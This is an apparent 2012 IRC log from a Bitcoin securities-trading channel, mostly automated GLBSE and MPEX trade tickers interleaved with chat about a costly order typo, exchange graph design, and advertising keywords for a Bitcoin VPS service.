[F.GIGA.ETF] 12943 @ 0.00110952 = 14.3605 BTC [+] Aug 10 11:06:45 [GLBSE] [FOO.PPPPT] 2 @ 0.9999 = 1.9998 BTC [-] Aug 10 11:06:47 [GLBSE] [FOO.PPPPT] 3 @ 1 = 3 BTC [+] Aug 10 11:34:37 [MPEX] [S.MPOE] 60377 @ 0.00028241 = 17.0511 BTC [-] Aug 10 11:40:17 [GLBSE] [ASICMINER] 25 @ 0.1 = 2.5 BTC Aug 10 11:45:26 [GLBSE] [CIUCIU.BOND] 4 @ 0.1 = 0.4 BTC Aug 10 12:04:59 sales of all NYAN securities will be suspended in 3 hours until divs paid on sunday/monday. Aug 10 12:05:06 get in now and rule the aftermarket :) Aug 10 12:07:43 [GLBSE] [BITBOND] 2 @ 0.3632 = 0.7264 BTC [-] Aug 10 12:32:06 [GLBSE] [ASICMINER] 150 @ 0.1 = 15 BTC Aug 10 12:51:39 [GLBSE] [NYAN.A] 10 @ 1.01 = 10.1 BTC [+] Aug 10 12:57:37 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.98076923 BTC [-] Aug 10 13:00:25 [GLBSE] [TYGRR.BOND-PI] 4 @ 1.7 = 6.8 BTC [+] Aug 10 13:03:12 [GLBSE] [ASICMINER] 1 @ 0.1 BTC Aug 10 13:29:21 [GLBSE] [MOORE] 1 @ 0.5148 BTC [+] Aug 10 13:30:55 [MPEX] [F.GIGA.ETF] 1515 @ 0.00111241 = 1.6853 BTC [+] Aug 10 13:33:00 [MPEX] [O.BTCUSD.P060T] 23 @ 0.02675251 = 0.6153 BTC [-] Aug 10 13:33:01 [MPEX] [O.BTCUSD.P060T] 298 @ 0.00025113 = 0.0748 BTC [-] Aug 10 13:33:27 [MPEX] [O.BTCUSD.P010T] 33 @ 0.02546216 = 0.8403 BTC [-] Aug 10 13:33:29 [MPEX] [O.BTCUSD.P010T] 230 @ 0.00000002 BTC [-] Aug 10 13:34:20 [MPEX] [O.BTCUSD.P020T] 238 @ 0.00000004 BTC [-] Aug 10 13:34:54 [MPEX] [O.BTCUSD.P070T] 24 @ 0.02413128 = 0.5792 BTC [-] Aug 10 13:34:55 [MPEX] [O.BTCUSD.P070T] 203 @ 0.00062318 = 0.1265 BTC [-] Aug 10 13:35:28 [MPEX] [O.BTCUSD.P040T] 73 @ 0.00799023 = 0.5833 BTC [-] Aug 10 13:35:30 [MPEX] [O.BTCUSD.P040T] 113 @ 0.00001615 = 0.0018 BTC [-] Aug 10 13:35:50 [MPEX] [O.BTCUSD.P030T] 175 @ 0.0000016 = 0.0003 BTC [-] Aug 10 13:36:27 [MPEX] [O.BTCUSD.P080T] 9 @ 0.0362488 = 0.3262 BTC [-] Aug 10 13:36:29 [MPEX] [O.BTCUSD.P080T] 120 @ 0.00129544 = 0.1555 BTC [-] Aug 10 13:36:49 [MPEX] [O.BTCUSD.P050T] 2 @ 0.00441951 = 0.0088 BTC [-] Aug 10 13:36:51 [MPEX] [O.BTCUSD.P050T] 116 @ 0.00007824 = 0.0091 BTC [-] Aug 10 13:37:25 [MPEX] [O.BTCUSD.C060T] 91 @ 0.47277974 = 43.023 BTC [-] Aug 10 13:38:14 [MPEX] [O.BTCUSD.P090T] 60 @ 0.03780068 = 2.268 BTC [-] Aug 10 13:38:45 [MPEX] [O.BTCUSD.P100T] 9 @ 0.07678485 = 0.6911 BTC [-] Aug 10 13:38:46 [MPEX] [O.BTCUSD.P100T] 4 @ 0.06452764 = 0.2581 BTC [-] Aug 10 13:38:48 [MPEX] [O.BTCUSD.P100T] 42 @ 0.06231684 = 2.6173 BTC [-] Aug 10 13:40:47 [MPEX] [O.BTCUSD.P080T] 9 @ 0.00129458 = 0.0117 BTC [-] Aug 10 13:41:09 [MPEX] [O.BTCUSD.P150T] 1 @ 0.32255067 BTC [-] Aug 10 13:42:18 [MPEX] [O.BTCUSD.P100T] 13 @ 0.06229445 = 0.8098 BTC [-] Aug 10 13:42:39 [MPEX] [O.BTCUSD.P010T] 33 @ 0.00000002 BTC [-] Aug 10 13:43:34 [MPEX] [O.BTCUSD.P070T] 24 @ 0.00062263 = 0.0149 BTC [-] Aug 10 13:43:47 [MPEX] [O.BTCUSD.P060T] 23 @ 0.00025084 = 0.0058 BTC [-] Aug 10 13:44:22 [MPEX] [O.BTCUSD.P130T] 1 @ 0.23125734 BTC [-] Aug 10 13:53:56 [MPEX] [O.BTCUSD.C100T] 5 @ 0.1738158 = 0.8691 BTC [+] Aug 10 13:53:56 [MPEX] [O.BTCUSD.C100T] 795 @ 0.24007491 = 190.8596 BTC [+] Aug 10 13:58:01 [GLBSE] [ASICMINER] 11 @ 0.1 = 1.1 BTC Aug 10 14:00:33 [GLBSE] [FOO.PPPPT] 27 @ 1.01 = 27.27 BTC [+] Aug 10 14:02:16 [GLBSE] [BIB.PIRATE] 1 @ 1.0199999 BTC [-] Aug 10 14:02:17 [GLBSE] [BIB.PIRATE] 49 @ 1.02 = 49.98 BTC [+] Aug 10 14:03:09 [GLBSE] [COGNITIVE] 5 @ 0.7201 = 3.6005 BTC [+] Aug 10 14:03:11 [GLBSE] [COGNITIVE] 10 @ 0.72 = 7.2 BTC [-] Aug 10 14:03:28 [GLBSE] [ASICMINER] 500 @ 0.1 = 50 BTC Aug 10 14:03:54 [GLBSE] [ASICMINER] 200 @ 0.1 = 20 BTC Aug 10 14:04:07 [GLBSE] [GIPPT] 2 @ 1.2489 = 2.4978 BTC [+] Aug 10 14:04:48 [GLBSE] [ASICMINER] 200 @ 0.1 = 20 BTC Aug 10 14:06:23 [GLBSE] [ASICMINER] 95 @ 0.1 = 9.5 BTC Aug 10 14:08:24 [GLBSE] [PPT.DIV] 3 @ 0.5787 = 1.7361 BTC [-] Aug 10 14:09:12 [GLBSE] [GIPPT] 48 @ 1.2489 = 59.9472 BTC [+] Aug 10 14:10:27 [GLBSE] [GIPPT] 50 @ 1.249 = 62.45 BTC [+] Aug 10 14:11:36 [GLBSE] [OBSI.1MHS] 2 @ 0.1 = 0.2 BTC [+] Aug 10 14:14:39 [GLBSE] [GIGAMINING] 2 @ 1.14139999 = 2.2828 BTC [+] Aug 10 14:14:59 [GLBSE] [ASICMINER] 16 @ 0.1 = 1.6 BTC Aug 10 14:22:25 [GLBSE] [BITBOND] 2 @ 0.3995899 = 0.7992 BTC [+] Aug 10 14:23:05 [MPEX] [O.HASH.C10TH] 150000 @ 0.00077701 = 116.5515 BTC [-] Aug 10 14:23:27 [GLBSE] [BIB.BVPS] 13 @ 0.0045 = 0.0585 BTC [+] Aug 10 14:43:52 [GLBSE] [PUREMINING] 3 @ 0.138 = 0.414 BTC [-] Aug 10 14:44:35 [MPEX] [F.GIGA.ETF] 7042 @ 0.00110371 = 7.7723 BTC [-] Aug 10 14:44:37 [MPEX] [F.GIGA.ETF] 7423 @ 0.00111111 = 8.2478 BTC [+] Aug 10 14:45:04 [GLBSE] [GIGAMINING] 4 @ 1.1401 = 4.5604 BTC [-] Aug 10 14:47:48 [GLBSE] [FOO.PPPPT] 14 @ 1.014499 = 14.203 BTC [+] Aug 10 14:53:29 [GLBSE] [BITBOND] 5 @ 0.3951 = 1.9755 BTC [-] Aug 10 14:53:59 [GLBSE] [BITBOND] 1 @ 0.3951 BTC [-] Aug 10 14:56:51 [GLBSE] [BITBOND] 2 @ 0.3995899 = 0.7992 BTC [+] Aug 10 15:01:10 [GLBSE] [YABMC] 6 @ 0.1139 = 0.6834 BTC [-] Aug 10 15:06:54 [GLBSE] [HYDRO.BONDS] 20 @ 1.325 = 26.5 BTC [+] Aug 10 15:08:19 [MPEX] [S.MPOE] 17534 @ 0.00028241 = 4.9518 BTC [-] Aug 10 15:08:20 [MPEX] [S.MPOE] 49267 @ 0.00027842 = 13.7169 BTC [-] Aug 10 15:16:27 [GLBSE] [SYNERGY] 4 @ 0.19659999 = 0.7864 BTC [+] Aug 10 15:16:29 [GLBSE] [SYNERGY] 1 @ 0.1966 BTC [+] Aug 10 15:19:25 [GLBSE] [TYGRR.BOND-P] 1 @ 1.02689999 BTC [+] Aug 10 15:22:47 [MPEX] [S.MPOE] 10949 @ 0.00027792 = 3.0429 BTC [-] Aug 10 15:22:49 [MPEX] [S.MPOE] 4445 @ 0.00028444 = 1.2643 BTC [+] Aug 10 15:22:50 [MPEX] [S.MPOE] 48694 @ 0.00028896 = 14.0706 BTC [+] Aug 10 15:23:45 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC Aug 10 15:24:12 [GLBSE] [GIGAMINING] 1 @ 1.1401 BTC [-] **** BEGIN LOGGING AT Sat Aug 11 02:45:02 2012 Aug 11 02:52:05 [MPEX] [S.BVPS] 1516 @ 0.00276346 = 4.1894 BTC [-] Aug 11 02:53:07 [GLBSE] [NASTY] 5 @ 0.54 = 2.7 BTC [-] Aug 11 02:55:21 [MPEX] [F.GIGA.ETF] 9732 @ 0.00111361 = 10.8377 BTC [+] Aug 11 02:57:53 [GLBSE] [OBSI.HRPT] 1 @ 0.1097 BTC [-] Aug 11 03:05:48 [GLBSE] [FOO.PPPPT] 1 @ 1.015 BTC [+] Aug 11 03:10:53 [MPEX] [S.MPOE] 20249 @ 0.00031109 = 6.2993 BTC [-] Aug 11 03:10:54 [MPEX] [S.MPOE] 44856 @ 0.00031202 = 13.996 BTC [+] Aug 11 03:10:55 [MPEX] [S.MPOE] 6196 @ 0.00031237 = 1.9354 BTC [+] Aug 11 03:10:56 [MPEX] [S.MPOE] 720 @ 0.00031338 = 0.2256 BTC [+] Aug 11 03:19:55 [GLBSE] [GIGAMINING] 1 @ 1.11060001 BTC [+] Aug 11 03:22:56 [GLBSE] [BITBOND] 1 @ 0.37200001 BTC [-] Aug 11 03:23:44 [GLBSE] [HYDRO.BONDS] 6 @ 1.325 = 7.95 BTC [+] Aug 11 03:24:14 [GLBSE] [OBSI.HRPT] 1 @ 0.1097 BTC [-] Aug 11 03:26:02 [GLBSE] [HYDRO.BONDS] 3 @ 1.31031 = 3.9309 BTC [-] Aug 11 03:26:27 [MPEX] [F.GIGA.ETF] 511 @ 0.00111361 = 0.5691 BTC [+] Aug 11 03:26:29 [MPEX] [F.GIGA.ETF] 8560 @ 0.0011198 = 9.5855 BTC [+] Aug 11 03:26:30 [MPEX] [F.GIGA.ETF] 756 @ 0.00112281 = 0.8488 BTC [+] Aug 11 03:26:31 [MPEX] [F.GIGA.ETF] 735 @ 0.00112458 = 0.8266 BTC [+] Aug 11 03:26:32 [MPEX] [F.GIGA.ETF] 14255 @ 0.0011277 = 16.0754 BTC [+] Aug 11 03:26:34 [MPEX] [F.GIGA.ETF] 10000 @ 0.00113043 = 11.3043 BTC [+] Aug 11 03:26:34 [MPEX] [F.GIGA.ETF] 5183 @ 0.00113068 = 5.8603 BTC [+] Aug 11 03:27:08 [GLBSE] [GIGAMINING] 1 @ 1.14099998 BTC [+] Aug 11 03:28:06 [GLBSE] [BITBOND] 1 @ 0.39968998 BTC [+] Aug 11 03:28:10 [GLBSE] [HYDRO.BONDS] 3 @ 1.325 = 3.975 BTC [+] Aug 11 03:29:08 [GLBSE] [GMVT-BOT] 24 @ 0.1 = 2.4 BTC [-] Aug 11 03:31:06 [GLBSE] [CPA] 9 @ 0.10296 = 0.9266 BTC [+] Aug 11 03:31:50 [GLBSE] [OBSI.HRPT] 18 @ 0.1097 = 1.9746 BTC [-] Aug 11 03:32:05 [GLBSE] [PPT.DIV] 3 @ 0.57869999 = 1.7361 BTC [-] Aug 11 03:32:06 [GLBSE] [PPT.DIV] 2 @ 0.57879999 = 1.1576 BTC [+] Aug 11 03:32:08 [GLBSE] [PPT.DIV] 95 @ 0.57999 = 55.0991 BTC [+] Aug 11 03:33:12 [GLBSE] [PPT.DIV] 50 @ 0.58 = 29 BTC [+] Aug 11 03:33:14 [GLBSE] [PPT.DIV] 50 @ 0.581 = 29.05 BTC [+] Aug 11 03:34:25 [GLBSE] [BITBOND] 1 @ 0.39968998 BTC [+] Aug 11 03:35:28 [GLBSE] [GIGAMINING] 1 @ 1.11070001 BTC [-] Aug 11 03:36:12 [GLBSE] [FOO.PPPPT] 2 @ 1.015 = 2.03 BTC [+] Aug 11 03:37:03 [GLBSE] [OBSI.HRPT] 3 @ 0.1097 = 0.3291 BTC [-] Aug 11 03:37:43 [GLBSE] [OBSI.HRPT] 5 @ 0.10511 = 0.5256 BTC [-] Aug 11 03:37:45 [GLBSE] [OBSI.HRPT] 3 @ 0.1051 = 0.3153 BTC [-] Aug 11 03:37:46 [GLBSE] [OBSI.HRPT] 1 @ 0.105 BTC [-] Aug 11 03:37:48 [GLBSE] [OBSI.HRPT] 2 @ 0.104 = 0.208 BTC [-] Aug 11 03:37:49 [GLBSE] [OBSI.HRPT] 2 @ 0.101 = 0.202 BTC [-] Aug 11 03:41:12 [GLBSE] [BMF] 4 @ 0.6899 = 2.7596 BTC [+] Aug 11 03:41:14 [GLBSE] [BMF] 10 @ 0.69 = 6.9 BTC [+] Aug 11 03:41:15 [GLBSE] [BMF] 6 @ 0.7 = 4.2 BTC [+] Aug 11 03:41:39 [MPEX] [O.BTCUSD.C080T] 400 @ 0.39062571 = 156.2503 BTC [+] Aug 11 03:42:14 [GLBSE] [MINING] 10 @ 0.8 = 8 BTC [+] Aug 11 03:46:55 [GLBSE] [OBSI.1MHS] 1 @ 0.1 BTC [+] Aug 11 03:48:31 [MPEX] [S.MPOE] 48757 @ 0.00031338 = 15.2795 BTC [+] Aug 11 03:48:33 [MPEX] [S.MPOE] 58740 @ 0.00031462 = 18.4808 BTC [+] Aug 11 03:48:34 [MPEX] [S.MPOE] 17820 @ 0.00031586 = 5.6286 BTC [+] Aug 11 03:48:34 [MPEX] [S.MPOE] 53112 @ 0.00031653 = 16.8115 BTC [+] Aug 11 03:48:35 [MPEX] [S.MPOE] 5007 @ 0.00031654 = 1.5849 BTC [+] Aug 11 03:48:37 [MPEX] [S.MPOE] 8930 @ 0.00031663 = 2.8275 BTC [+] Aug 11 03:48:38 [MPEX] [S.MPOE] 49621 @ 0.00031693 = 15.7264 BTC [+] Aug 11 03:48:39 [MPEX] [S.MPOE] 46151 @ 0.00031806 = 14.6788 BTC [+] Aug 11 03:48:40 [MPEX] [S.MPOE] 24101 @ 0.00031839 = 7.6735 BTC [+] Aug 11 03:48:41 [MPEX] [S.MPOE] 49262 @ 0.000319 = 15.7146 BTC [+] Aug 11 03:48:42 [MPEX] [S.MPOE] 14266 @ 0.00031924 = 4.5543 BTC [+] Aug 11 03:48:43 [MPEX] [S.MPOE] 27481 @ 0.00032013 = 8.7975 BTC [+] Aug 11 03:48:43 [MPEX] [S.MPOE] 58348 @ 0.00032016 = 18.6807 BTC [+] Aug 11 03:48:44 [MPEX] [S.MPOE] 76812 @ 0.00032109 = 24.6636 BTC [+] Aug 11 03:48:45 [MPEX] [S.MPOE] 39087 @ 0.00032134 = 12.5602 BTC [+] Aug 11 03:48:47 [MPEX] [S.MPOE] 8485 @ 0.0003226 = 2.7373 BTC [+] Aug 11 03:48:48 [MPEX] [S.MPOE] 31096 @ 0.00032354 = 10.0608 BTC [+] Aug 11 03:48:49 [MPEX] [S.MPOE] 22753 @ 0.00032545 = 7.405 BTC [+] Aug 11 03:48:50 [MPEX] [S.MPOE] 23581 @ 0.00032567 = 7.6796 BTC [+] Aug 11 03:48:51 [MPEX] [S.MPOE] 10629 @ 0.00032623 = 3.4675 BTC [+] Aug 11 03:48:52 [MPEX] [S.MPOE] 56309 @ 0.0003267 = 18.3962 BTC [+] Aug 11 03:48:53 [MPEX] [S.MPOE] 46779 @ 0.00032675 = 15.285 BTC [+] Aug 11 03:48:53 [MPEX] [S.MPOE] 22873 @ 0.00032806 = 7.5037 BTC [+] Aug 11 03:54:29 [MPEX] [S.MPOE] 14701 @ 0.00032806 = 4.8228 BTC [+] Aug 11 03:54:30 [MPEX] [S.MPOE] 20599 @ 0.0003286 = 6.7688 BTC [+] Aug 11 03:55:39 @#$&*%@*( Aug 11 03:55:47 I lost 40 BTC due to a typo Aug 11 03:55:57 ouch Aug 11 03:56:00 what kinda typo Aug 11 03:56:10 just 1 char off on a btc addy? Aug 11 03:56:27 i thought addy has checksum Aug 11 03:56:35 more like 47 Aug 11 03:57:01 pasted the wrong addy then Aug 11 03:57:06 sold 57 PPT.A for 0.12 BTC instead of 1.12... Aug 11 03:57:16 oh Aug 11 03:57:18 what diff does it make ? the price offered prevails anyway no ? Aug 11 03:57:41 there was no buy in apparently... but someone quickly bought them off =/ Aug 11 03:57:52 there was no buy offers ?! wow. Aug 11 03:58:11 indeed, so someone could jsut take them at 0.12 =/ Aug 11 03:58:21 i thought ppt stuff was really popular Aug 11 03:58:25 So I lost 500$ just like that Aug 11 03:58:47 well if its any consolation someone made it Aug 11 03:59:27 fuck... I'm getting tired of this. I constantly make typos. Aug 11 03:59:37 you need an editor :D Aug 11 03:59:55 editors don't help price typos eh Aug 11 04:00:01 [GLBSE] [OBSI.HRPT] 2 @ 0.1095 = 0.219 BTC [+] Aug 11 04:00:17 ya but your bad orders would be otherwise perfectly punctuated and spelled. Aug 11 04:00:19 there should have been bids Aug 11 04:00:35 There was none Aug 11 04:00:42 yeah i mean Aug 11 04:01:03 there should have been, if glbse didnt have that reserve thign the way it is Aug 11 04:01:04 [GLBSE] [OBSI.HRPT] 6 @ 0.1096 = 0.6576 BTC [+] Aug 11 04:01:05 [GLBSE] [ASICMINER] 30 @ 0.1 = 3 BTC Aug 11 04:01:06 [GLBSE] [TYGRR.BOND-P] 4 @ 1.02569999 = 4.1028 BTC [+] Aug 11 04:01:08 [GLBSE] [TYGRR.BOND-P] 26 @ 1.02579999 = 26.6708 BTC [+] Aug 11 04:01:18 should be able to bid on multiple things with the same btc Aug 11 04:01:23 I'm really mad, lost days of work trading. Aug 11 04:01:26 apparently nef is fixing it Aug 11 04:01:55 first world problems. if you were a poor african you'd have lost your entire life's worth of throwing rocks or w/e Aug 11 04:01:57 NEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFf Aug 11 04:01:59 nef Aug 11 04:02:05 nope, doenst work Aug 11 04:02:08 hes a nefario Aug 11 04:02:13 doomed to never have a shortened nickname Aug 11 04:03:00 Rah, I need that money dammit Aug 11 04:03:30 nope sorry :P Aug 11 04:06:16 Well if someone in this channel reads this and has bought said shares, and nefario would care to confirm that sale was made from my account, I would really appreciate if you would be willing to give them back out of goodwill. Aug 11 04:07:01 yeah, some of you have bots, I'd suppose a bot would be the culprit in that case. Aug 11 04:07:20 http://www.fukung.net/v/38016/745881c8af17f6d33a04230972004679.gif Aug 11 04:07:44 im tempted to start a betting pool on this Aug 11 04:11:58 I saw the trade, but don't know who the other side was Aug 11 04:12:23 [MPEX] [S.MPOE] 33697 @ 0.0003286 = 11.0728 BTC [+] Aug 11 04:12:24 [MPEX] [S.MPOE] 46024 @ 0.0003288 = 15.1327 BTC [+] Aug 11 04:12:26 [MPEX] [S.MPOE] 16823 @ 0.00032912 = 5.5368 BTC [+] Aug 11 04:12:27 [MPEX] [S.MPOE] 29515 @ 0.00032989 = 9.7367 BTC [+] Aug 11 04:12:28 [MPEX] [S.MPOE] 54309 @ 0.00033026 = 17.9361 BTC [+] Aug 11 04:12:29 [MPEX] [S.MPOE] 18502 @ 0.00033086 = 6.1216 BTC [+] Aug 11 04:12:30 [MPEX] [S.MPOE] 57681 @ 0.00033166 = 19.1305 BTC [+] Aug 11 04:12:32 [MPEX] [S.MPOE] 31300 @ 0.00033207 = 10.3938 BTC [+] Aug 11 04:12:32 [MPEX] [S.MPOE] 212149 @ 0.00033229 = 70.495 BTC [+] Aug 11 04:14:24 only nef would know but that's private info =P Aug 11 04:14:44 I hope it's someone around here =/ Aug 11 04:15:28 Why so quiet? Aug 11 04:15:40 [MPEX] [S.BVPS] 211 @ 0.00276346 = 0.5831 BTC [-] Aug 11 04:15:41 [MPEX] [S.BVPS] 1289 @ 0.00256336 = 3.3042 BTC [-] Aug 11 04:15:47 because this is where you're supposed to accuse me of having them Aug 11 04:16:02 then we can have drama ? Aug 11 04:16:29 I am not dramatic enough to start such a play Aug 11 04:16:35 no, so I can hell at BTC-Mining because he knows I think pirate is a scam Aug 11 04:16:48 o, you're the only one. Aug 11 04:17:02 er, yell Aug 11 04:18:01 there's numerous businesses that make 10k apr or w/e. most of them in north korea. Aug 11 04:18:33 [GLBSE] [TYGRR.BOND-P] 1 @ 1.02569999 BTC [-] Aug 11 04:18:35 [GLBSE] [TYGRR.BOND-P] 2 @ 1.02579999 = 2.0516 BTC [+] Aug 11 04:20:25 [MPEX] [F.PURE.SYNTH] 247046 @ 0.00022 = 54.3501 BTC Aug 11 04:37:07 [GLBSE] [PUREMINING] 8 @ 0.15439999 = 1.2352 BTC [-] Aug 11 04:38:15 [GLBSE] [PUREMINING] 2 @ 0.15439999 = 0.3088 BTC [-] Aug 11 04:39:27 mircea: sounds as dodgy as Pirate Aug 11 04:40:20 North Korea ? or what ? Aug 11 04:41:03 [MPEX] [S.MPOE] 28000 @ 0.00033229 = 9.3041 BTC [+] Aug 11 04:41:54 such returns from a country such as North Korea Aug 11 04:41:54 [MPEX] [S.MPOE] 70627 @ 0.0003095 = 21.8591 BTC [-] Aug 11 04:41:55 [MPEX] [S.MPOE] 32998 @ 0.00030866 = 10.1852 BTC [-] Aug 11 04:41:56 [MPEX] [S.MPOE] 25241 @ 0.00030864 = 7.7904 BTC [-] Aug 11 04:41:57 [MPEX] [S.MPOE] 10483 @ 0.00029089 = 3.0494 BTC [-] Aug 11 04:41:58 [MPEX] [S.MPOE] 34838 @ 0.00028771 = 10.0232 BTC [-] Aug 11 04:41:59 [MPEX] [S.MPOE] 18012 @ 0.0002791 = 5.0271 BTC [-] Aug 11 04:42:01 [MPEX] [S.MPOE] 7801 @ 0.00027614 = 2.1542 BTC [-] Aug 11 04:42:19 well north korea has the advantage of the most excellent supreme leader kim. Aug 11 04:42:30 he was born when a star was twinkling or some shit you know. Aug 11 04:43:10 [MPEX] [S.MPOE] 13703 @ 0.00027614 = 3.7839 BTC [-] Aug 11 04:43:11 [MPEX] [S.MPOE] 880 @ 0.00026907 = 0.2368 BTC [-] Aug 11 04:43:13 [MPEX] [S.MPOE] 1000 @ 0.00023 = 0.23 BTC [-] Aug 11 04:43:14 [MPEX] [S.MPOE] 485 @ 0.00022863 = 0.1109 BTC [-] Aug 11 04:43:15 [MPEX] [S.MPOE] 2002 @ 0.0002249 = 0.4502 BTC [-] Aug 11 04:43:16 [MPEX] [S.MPOE] 2048 @ 0.000212 = 0.4342 BTC [-] Aug 11 04:43:16 [MPEX] [S.MPOE] 1898 @ 0.00018165 = 0.3448 BTC [-] Aug 11 04:43:17 [MPEX] [S.MPOE] 52984 @ 0.0001 = 5.2984 BTC [-] Aug 11 04:45:17 mircea Aug 11 04:45:20 mpex needs statistics Aug 11 04:45:23 and a better graph Aug 11 04:45:25 your graph is fucked Aug 11 04:46:05 whoa nelly 0.0001 ?! srsly ?! Aug 11 04:46:13 rg what statistics do you mean ? Aug 11 04:46:28 on stocks Aug 11 04:46:33 some god damn price history Aug 11 04:46:40 yes. what statistics, specifically. Aug 11 04:46:47 price history Aug 11 04:46:53 a better graph Aug 11 04:47:05 so you just mean, a different graph? Aug 11 04:47:05 get rid of the stupid icons Aug 11 04:47:10 no Aug 11 04:47:12 yeah, i think i will. Aug 11 04:47:14 i want to be able to see the price history on the graph Aug 11 04:47:20 and i want to be bale to read specific amounts Aug 11 04:47:22 on the bottom Aug 11 04:47:26 thought it'd be a nice way to showcase community talent but it didn't take me very far. Aug 11 04:47:29 so i get the rough idea from the graph Aug 11 04:47:33 then i read the specifics beow it Aug 11 04:47:35 below* Aug 11 04:47:40 and then i make a more informed trade Aug 11 04:47:42 that i feel good about Aug 11 04:47:48 that wouldn't be too hard to do, but wouldn't it be redundant ? Aug 11 04:47:53 i mean you have all that on the main page. Aug 11 04:48:00 do i ? Aug 11 04:48:07 well yes. graph goes from min to max Aug 11 04:48:14 and volume goes between 0 and 30 day. Aug 11 04:48:24 ok Aug 11 04:48:26 i still want a better graph Aug 11 04:48:36 that you can get, but you have to describe it. Aug 11 04:49:07 [GLBSE] [HYDRO.BONDS] 3 @ 1.3249 = 3.9747 BTC [-] Aug 11 04:50:02 ok Aug 11 04:50:05 it should be like the current one Aug 11 04:50:07 just make sense Aug 11 04:50:12 eah Aug 11 04:50:13 that's good Aug 11 04:50:39 hahaha Aug 11 04:53:07 there, unicorns and co are gone rg. happy now ? Aug 11 04:53:12 unicorn murderer! Aug 11 04:53:33 [GLBSE] [HYDRO.BONDS] 13 @ 1.325 = 17.225 BTC [+] Aug 11 04:53:35 sweet maybe people will take MPEX seriously now Aug 11 04:54:19 all i wanted was to help out teh starving artist :( Aug 11 04:54:22 is that so bad ? Aug 11 04:54:26 yep Aug 11 04:54:35 mircea Aug 11 04:54:36 i am sorry. Aug 11 04:54:40 what keywords should i advertise Aug 11 04:54:41 on google Aug 11 04:54:50 not 'vps' or anything retarded light that Aug 11 04:54:52 like* Aug 11 04:54:55 gee, ugh... Aug 11 04:54:57 a click for 'vps' would cost like $15 Aug 11 04:55:01 yeah Aug 11 04:55:08 why not make bitcoin derivations ? Aug 11 04:55:10 bitcoin, mtgox, Aug 11 04:55:15 bitcoin hosting Aug 11 04:55:18 bitcoin hosting ; bitcoin host ; bitcoin vps Aug 11 04:55:20 bitcoin wallet Aug 11 04:55:23 well Aug 11 04:55:28 we dont need for bitcoin vps Aug 11 04:55:31 we're already #1 organically Aug 11 04:55:35 even three word things work. secure bitcoin wallet Aug 11 04:55:59 well rg don't quote me on this, but I think the way keywords work Aug 11 04:56:16 is that if you advertise on things like bitcoin vps you might get some close-ish queries Aug 11 04:56:32 not just strictly that. so it might help. i dunno, i haven't done google ads in like 5 years Aug 11 04:56:38 i want to finish my nwe website Aug 11 04:56:39 ever since the clickbots got real stupid. Aug 11 04:56:39 the pictures are quite well done Aug 11 04:56:39 for bitvps Aug 11 04:56:55 which pictures patrickharnett ? Aug 11 04:57:06 rg: are you after a trade history database? Aug 11 04:57:30 The picks on the exchange website - the dragon and mermaid Aug 11 04:57:38 o. well they just got axed. Aug 11 04:57:44 they had their day. Aug 11 04:58:08 http://wallet.bitvps.com/ Aug 11 04:58:11 thts the new site Aug 11 04:58:12 ah, I see that - they were there yesterday Aug 11 04:58:16 i dont have the heart to finish it Aug 11 04:58:26 still needs the front page done Aug 11 04:58:37 yeah tjhey got axed a minute ago. truth of the matter is, i had a contest forthem, people could make 5 btc each to draw them for me Aug 11 04:58:39 windows vm page Aug 11 04:58:42 i was going to change them monthly. Aug 11 04:58:53 sadly people can't draw, so it was going nowhere. Aug 11 04:58:53 contact page, company info, wiki stuff Aug 11 04:58:58 ugh Aug 11 04:59:02 do this for me ;< Aug 11 04:59:17 rg your site looks like mpex with css Aug 11 04:59:44 [GLBSE] [GIGAMINING] 7 @ 1.12 = 7.84 BTC [+] Aug 11 04:59:57 i need a few new graphics to Aug 11 04:59:57 I remember the contest - I should have got my daughter to enter - she did some excellent work through high school Aug 11 05:00:12 maybe i can pay someone to do this Aug 11 05:00:19 [GLBSE] [PPT.B] 125 @ 1.051 = 131.375 BTC [-] Aug 11 05:00:20 [GLBSE] [PPT.B] 283 @ 1.05001 = 297.1528 BTC [-] Aug 11 05:00:22 [GLBSE] [PPT.B] 60 @ 1.050001 = 63.0001 BTC [-] Aug 11 05:00:23 [GLBSE] [PPT.B] 1000 @ 1.05 = 1050 BTC [-] Aug 11 05:00:23 why force a point, i think. im sure in a few years or w/e i can bring them back or do something better or anyway. Aug 11 05:00:24 [GLBSE] [PPT.B] 100 @ 1.05 = 105 BTC [-] Aug 11 05:00:25 [GLBSE] [PPT.B] 30 @ 1.05 = 31.5 BTC [-] Aug 11 05:00:26 [GLBSE] [PPT.B] 112 @ 1.05 = 117.6 BTC [-] Aug 11 05:00:26 [GLBSE] [PPT.B] 1 @ 1.05 BTC [-] Aug 11 05:00:27 [GLBSE] [PPT.B] 1289 @ 1.043 = 1344.427 BTC [-] Aug 11 05:00:29 i still think art and finance go together. Aug 11 05:00:47 rg talk to BTC-Mining , he was doing some design for me earlier. Aug 11 05:01:03 hehe Aug 11 05:01:08 he already does shit for me Aug 11 05:01:10 im looking for content writing Aug 11 05:01:11 not web design Aug 11 05:01:14 the site is already designed Aug 11 05:02:04 are there any copywriters in btc yet ? Aug 11 05:02:14 [GLBSE] [MU] 1 @ 0.46 BTC [-] Aug 11 05:02:50 Go ninja Go ninja GO! Aug 11 05:02:50 –Vanilla Ice Aug 11 05:02:55 dude what teh hell is that! Aug 11 05:04:14 uh Aug 11 05:04:16 its ninja rap Aug 11 05:04:18 [MPEX] [S.MPOE] 28967 @ 0.00033152 = 9.6031 BTC [+] Aug 11 05:04:18 by vanilla ice Aug 11 05:04:27 from teenage mutant ninja turtles movie Aug 11 05:04:27 duh Aug 11 05:04:36 you will get it in romania in a few more years Aug 11 05:04:59 all i have to say to you is http://www.youtube.com/watch?v=nzY2Qcu5i2A Aug 11 05:12:02 [GLBSE] [PPT.B] 1 @ 1.07 BTC [+] Aug 11 05:12:50 [MPEX] [O.BTCUSD.C090T] 500 @ 0.30892677 = 154.4634 BTC [+] Aug 11 05:13:40 [GLBSE] [MPOE.ETF] 1 @ 1.119 BTC [-] Aug 11 05:13:42 [GLBSE] [MPOE.ETF] 24 @ 1.12 = 26.88 BTC [+] Aug 11 05:13:59 god i need somebody to buy some puts. Aug 11 05:14:14 this is insanity, the market is 99% convinced the btc goes up up up. Aug 11 05:15:35 [GLBSE] [BITBOND] 1 @ 0.39968999 BTC [+] Aug 11 05:16:01 given only that info it sounds like a good time to short Aug 11 05:17:04 its what im affraid of, we crash and burn. Aug 